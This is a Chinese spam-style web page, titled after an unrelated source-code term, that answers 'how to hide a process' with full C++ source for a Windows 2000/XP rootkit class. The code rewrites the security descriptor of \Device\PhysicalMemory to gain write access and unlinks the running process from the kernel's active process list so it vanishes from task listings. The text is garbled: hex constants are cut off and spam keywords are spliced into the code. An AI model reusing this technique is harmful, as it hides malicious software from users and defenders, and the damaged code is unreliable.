皮皮网
皮皮网

【美女整站源码】【源码检查后门】【nestjs源码解读】pmap 源码

来源:下单系统源码 发表时间:2024-12-22 15:13:16

1.怎么隐藏进程

pmap 源码

怎么隐藏进程

       下载HideWindowPlus,源码可以隐藏.和老板键一样.注意,要无毒的,网上有些挂马了.

       多特软件站为上品.

       老兄,你的那位老兄一定说错了.不过按你说的这么干其实也不是不行,只是你得联系九游让他们把奇迹的源码给你,然后你再编译加入隐藏进程的代码,否则不可能.

       头文件如下:

       class CHideProcss

       {

       public:

        CHideProcss();

        BOOL HideProcess();

        virtual ~CHideProcss();

       private:

        BOOL InitNTDLL();

        BOOL YHideProcess();

        VOID CloseNTDLL();

        VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);

        HANDLE OpenPhysicalMemory();

        PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);

        ULONG GetData(PVOID addr);

        BOOL SetData(PVOID addr,ULONG data);

        long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

       };

       2。CPP文件如下

       // HideProcss.cpp: implementation of the CHideProcss class.

       //进程隐藏程序

       // 要隐藏时调用HideProcess即可

       //////////////////////////////////////////////////////////////////////

       #i nclude "stdafx.h"

       #i nclude "HideProcss.h"

       #i nclude<windows.h>

       #i nclude<Accctrl.h>

       #i nclude<Aclapi.h>

       #ifdef _DEBUG

       #undef THIS_FILE

       static char THIS_FILE[]=__FILE__;

       #define new DEBUG_NEW

       #endif

       #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

       #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xCL)

       #define STATUS_ACCESS_DENIED ((NTSTATUS)0xCL)

       typedef LONG NTSTATUS;

       typedef struct _IO_STATUS_BLOCK

       {

        NTSTATUS Status;

        ULONG Information;

       } IO_STATUS_BLOCK,源码美女整站源码 *PIO_STATUS_BLOCK;

       typedef struct _UNICODE_STRING

       {

        USHORT Length;

        USHORT MaximumLength;

        PWSTR Buffer;

       } UNICODE_STRING, *PUNICODE_STRING;

       #define OBJ_INHERIT 0xL

       #define OBJ_PERMANENT 0xL

       #define OBJ_EXCLUSIVE 0xL

       #define OBJ_CASE_INSENSITIVE 0xL

       #define OBJ_OPENIF 0xL

       #define OBJ_OPENLINK 0xL

       #define OBJ_KERNEL_HANDLE 0xL

       #define OBJ_VALID_ATTRIBUTES 0xF2L

       typedef struct _OBJECT_ATTRIBUTES

       {

        ULONG Length;

        HANDLE RootDirectory;

        PUNICODE_STRING ObjectName;

        ULONG Attributes;

        PVOID SecurityDescriptor;

        PVOID SecurityQualityOfService;

       } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

       typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(

        OUT PHANDLE SectionHandle,

        IN ACCESS_MASK DesiredAccess,

        IN POBJECT_ATTRIBUTES ObjectAttributes

        );

       typedef VOID (CALLBACK* RTLINITUNICODESTRING)(

        IN OUT PUNICODE_STRING DestinationString,

        IN PCWSTR SourceString

        );

       RTLINITUNICODESTRING RtlInitUnicodeString;

       ZWOPENSECTION ZwOpenSection;

       HMODULE g_hNtDLL = NULL;

       PVOID g_pMapPhysicalMemory = NULL;

       HANDLE g_hMPM = NULL;

       OSVERSIONINFO g_osvi;

       //---------------------------------------------------------------------------

       //////////////////////////////////////////////////////////////////////

       // Construction/Destruction

       //////////////////////////////////////////////////////////////////////

       CHideProcss::CHideProcss()

       {

       }

       CHideProcss::~CHideProcss()

       {

       }

       BOOL CHideProcss::InitNTDLL()

       {

        g_hNtDLL = LoadLibrary("ntdll.dll");

        if (NULL == g_hNtDLL)

        return FALSE;

        RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

        "RtlInitUnicodeString");

        ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

        return TRUE;

       }

       //---------------------------------------------------------------------------

       VOID CHideProcss::CloseNTDLL()

       {

        if(NULL != g_hNtDLL)

        FreeLibrary(g_hNtDLL);

        g_hNtDLL = NULL;

       }

       //---------------------------------------------------------------------------

       VOID CHideProcss::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)

       {

        PACL pDacl = NULL;

        PSECURITY_DESCRIPTOR pSD = NULL;

        PACL pNewDacl = NULL;

        DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

        NULL, &pDacl, NULL, &pSD);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }

        EXPLICIT_ACCESS ea;

        RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

        ea.grfAccessPermissions = SECTION_MAP_WRITE;

        ea.grfAccessMode = GRANT_ACCESS;

        ea.grfInheritance= NO_INHERITANCE;

        ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;

        ea.Trustee.TrusteeType = TRUSTEE_IS_USER;

        ea.Trustee.ptstrName = "CURRENT_USER";

        dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }

        dwRes = SetSecurityInfo

        (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }

       }

       //---------------------------------------------------------------------------

       HANDLE CHideProcss::OpenPhysicalMemory()

       {

        NTSTATUS status;

        UNICODE_STRING physmemString;

        OBJECT_ATTRIBUTES attributes;

        ULONG PhyDirectory;

        g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

        GetVersionEx (&g_osvi);

        if (5 != g_osvi.dwMajorVersion)

        return NULL;

        switch(g_osvi.dwMinorVersion)

        {

        case 0:

        PhyDirectory = 0x;

        break; //2k

        case 1:

        PhyDirectory = 0x;

        break; //xp

        default:

        return NULL;

        }

        RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

        attributes.Length = sizeof(OBJECT_ATTRIBUTES);

        attributes.RootDirectory = NULL;

        attributes.ObjectName = &physmemString;

        attributes.Attributes = 0;

        attributes.SecurityDescriptor = NULL;

        attributes.SecurityQualityOfService = NULL;

        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

        if(status == STATUS_ACCESS_DENIED)

        {

        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);

        SetPhyscialMemorySectionCanBeWrited(g_hMPM);

        CloseHandle(g_hMPM);

        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

        }

        if(!NT_SUCCESS(status))

        return NULL;

        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

        0x);

        if( g_pMapPhysicalMemory == NULL )

        return NULL;

        return g_hMPM;

       }

       //---------------------------------------------------------------------------

       PVOID CHideProcss::LinearToPhys(PULONG BaseAddress, PVOID addr)

       {

        ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;

        PGDE = BaseAddress[VAddr>>];

        if (0 == (PGDE&1))

        return 0;

        ULONG tmp = PGDE & 0x;

        if (0 != tmp)

        {

        PAddr = (PGDE & 0xFFC) + (VAddr & 0xFFFFF);

        }

        else

        {

        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff, 0x);

        PTE = ((PULONG)PGDE)[(VAddr&0xFF)>>];

        if (0 == (PTE&1))

        return 0;

        PAddr=(PTE&0xFFFFF)+(VAddr&0xFFF);

        UnmapViewOfFile((PVOID)PGDE);

        }

        return (PVOID)PAddr;

       }

       //---------------------------------------------------------------------------

       ULONG CHideProcss::GetData(PVOID addr)

       {

        ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);

        PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

        0xfffff, 0x);

        if (0 == tmp)

        return 0;

        ULONG ret = tmp[(phys & 0xFFF)>>2];

        UnmapViewOfFile(tmp);

        return ret;

       }

       //---------------------------------------------------------------------------

       BOOL CHideProcss::SetData(PVOID addr,ULONG data)

       {

        ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);

        PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff, 0x);

        if (0 == tmp)

        return FALSE;

        tmp[(phys & 0xFFF)>>2] = data;

        UnmapViewOfFile(tmp);

        return TRUE;

       }

       //---------------------------------------------------------------------------

       long __stdcall CHideProcss::exeception(struct _EXCEPTION_POINTERS *tmp)

       {

        ExitProcess(0);

        return 1 ;

       }

       //---------------------------------------------------------------------------

       BOOL CHideProcss::YHideProcess()

       {

       // SetUnhandledExceptionFilter(exeception);

        if (FALSE == InitNTDLL())

        return FALSE;

        if (0 == OpenPhysicalMemory())

        return FALSE;

        ULONG thread = GetData((PVOID)0xFFDFF); //kteb

        ULONG process = GetData(PVOID(thread + 0x)); //kpeb

        ULONG fw, bw;

        if (0 == g_osvi.dwMinorVersion)

        {

        fw = GetData(PVOID(process + 0xa0));

        bw = GetData(PVOID(process + 0xa4));

        }

        if (1 == g_osvi.dwMinorVersion)

        {

        fw = GetData(PVOID(process + 0x));

        bw = GetData(PVOID(process + 0x8c));

        }

        SetData(PVOID(fw + 4), bw);

        SetData(PVOID(bw), fw);

        CloseHandle(g_hMPM);

        CloseNTDLL();

        return TRUE;

       }

       // 隐藏进程的显示

       BOOL CHideProcss::HideProcess()

       {

        static BOOL b_hide = false;

        if (!b_hide)

        {

        b_hide = true;

        YHideProcess();

        return true;

        }

        return true;

       }

       其实隐藏程序就行了,它只会在进程中出现,其他地方找不到的.也不会影响星际.前题是你的电脑够牛.

相关栏目:综合